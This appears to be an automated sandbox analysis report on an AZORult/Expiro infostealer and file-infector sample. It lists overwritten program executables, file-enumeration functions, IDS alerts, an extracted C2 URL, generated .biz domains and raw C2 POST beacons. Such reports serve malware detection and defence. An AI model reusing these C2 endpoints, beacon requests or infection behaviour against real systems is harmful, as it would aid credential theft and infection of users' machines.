              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{9DD40E31-8782-438B-BCFD-713DE1B3090F}\117.0.5938.134_117.0.5938.132_chrome_updater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
              Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004098A0 FindFirstFileW,FindNextFileW,8_2_004098A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D0A0 FindFirstFileW,8_2_0040D0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,8_2_00414408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,8_2_00408D44
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00415610 FindFirstFileW,FindNextFileW,8_2_00415610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,8_2_004087DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D06E FindFirstFileW,8_2_0040D06E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041303C FindFirstFileW,FindNextFileW,FindClose,8_2_0041303C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040989F FindFirstFileW,FindNextFileW,8_2_0040989F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,8_2_004111C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,8_2_00414408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00415610 FindFirstFileW,FindNextFileW,8_2_00415610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,8_2_00408D3C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,8_2_00412D70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041158C FindFirstFileW,FindNextFileW,FindClose,8_2_0041158C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00411590 FindFirstFileW,FindNextFileW,FindClose,8_2_00411590
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,8_2_00412D9C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49709 -> 18.141.10.107:80
              Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.9:49707 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.9:49707 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2029137 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M2 : 104.21.96.1:80 -> 192.168.2.9:49707
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:50942 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:65066 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.9:61505 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.9:50995 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.9:49770 -> 18.246.231.120:80
              Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.9:49722 -> 104.21.96.1:80
              Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.9:64907 -> 1.1.1.1:53
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://k1d5.icu/TP341/index.php
              Queries random domain names (often used to prevent blacklisting and sinkholes)
              Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
              Source: unknownNetwork traffic detected: DNS query count 87
              Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
              Source: Joe Sandbox ViewIP Address: 3.254.94.185 3.254.94.185
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.9:49709
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.9:49709
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.9:49710
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.9:49710
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:49713
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:49713
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.9:49759
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.9:49759
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.9:49744
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.9:49744
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.9:49754
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.9:49754
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.9:49772
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.9:49772
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.9:49770
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.9:49760
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.9:49760
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.9:49770
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.9:49797
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.9:49797
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.9:49789
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.9:49789
              Source: global trafficHTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 101Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6c ea 26 66 97 46 14 e8 40 10 8b 31 11 8b 30 66 ef 47 11 8b 30 65 8b 30 63 8b 30 65 8b 30 60 8b 31 11 8b 30 66 e8 26 66 99 26 66 98 26 66 9a 46 70 9d 3b 17 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410l&fF@10fG0e0c0e0`10f&f&f&fFp;
              Source: global trafficHTTP traffic detected: POST /pj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: POST /pipasemmaulffaco HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: POST /iqhmiklhuwbcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jwaobwjsxgqjxsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: POST /krqescexcxjlmqje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jakwogupdhlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: POST /fmwgjkn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cygwkoswoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: GET /cygwkoswoy?usid=18&utid=30152678086 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: POST /exyejkfqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
              Source: global trafficHTTP traffic detected: POST /gedtsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
